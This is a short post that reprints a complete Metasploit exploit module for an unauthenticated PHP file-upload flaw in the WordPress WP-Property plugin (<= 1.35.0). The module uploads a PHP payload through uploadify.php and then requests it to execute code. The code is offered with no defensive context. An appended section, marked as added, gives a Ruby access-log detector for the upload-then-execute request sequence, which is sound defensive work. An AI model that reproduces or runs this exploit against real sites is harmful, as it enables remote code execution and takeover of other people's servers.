WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. I'm talking about msf.
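
Added example, not part of the original post or of the Metasploit project: a Ruby check that scans web-server access logs for the request pair the module above produces, a successful POST to uploadify.php followed by a GET for another PHP file in the same uploadify directory from the same client. The combined log format, the function name `find_uploadify_abuse` and the sample lines are assumptions constructed for illustration.

```ruby
# Added detection example (not from the original post).
# Flags a client that POSTs to WP-Property's uploadify.php and then requests
# another PHP file from the same directory: the upload-then-execute sequence.

UPLOADIFY_DIR = %r{/wp-content/plugins/wp-property/third-party/uploadify/}i
# Assumption: Apache/nginx "combined" access-log format.
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3}) /

# Returns findings as hashes: { ip:, upload_ts:, exec_path:, exec_ts: }
def find_uploadify_abuse(lines)
  uploads = {}   # client IP => timestamp of its last successful upload POST
  findings = []
  lines.each do |line|
    m = LOG_LINE.match(line)
    next unless m
    path = m[:path].split('?', 2).first   # ignore any query string
    next unless path =~ UPLOADIFY_DIR
    file = File.basename(path)
    is_handler = file.casecmp('uploadify.php').zero?
    if m[:method] == 'POST' && is_handler && m[:status] == '200'
      uploads[m[:ip]] = m[:ts]
    elsif !is_handler && file =~ /\.ph(p\d?|tml)\z/i && uploads.key?(m[:ip])
      findings << { ip: m[:ip], upload_ts: uploads[m[:ip]],
                    exec_path: path, exec_ts: m[:ts] }
    end
  end
  findings
end

# Constructed sample log lines (documentation IP ranges, made-up file name).
SAMPLE_LOG = <<~LOG.lines
  198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.9 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.9 - - [04/Jan/2013:19:41:11 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"
  203.0.113.9 - - [04/Jan/2013:19:41:12 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/AbCdE.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.7 - - [04/Jan/2013:19:42:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
LOG

if __FILE__ == $PROGRAM_NAME
  find_uploadify_abuse(SAMPLE_LOG).each do |f|
    puts "#{f[:ip]} uploaded at #{f[:upload_ts]}, then requested #{f[:exec_path]} at #{f[:exec_ts]}"
  end
end
```

Because the module requests its payload with `:unlink_self=>true`, the uploaded file may no longer be on disk when a hit is reviewed, so the log pair is the evidence to keep.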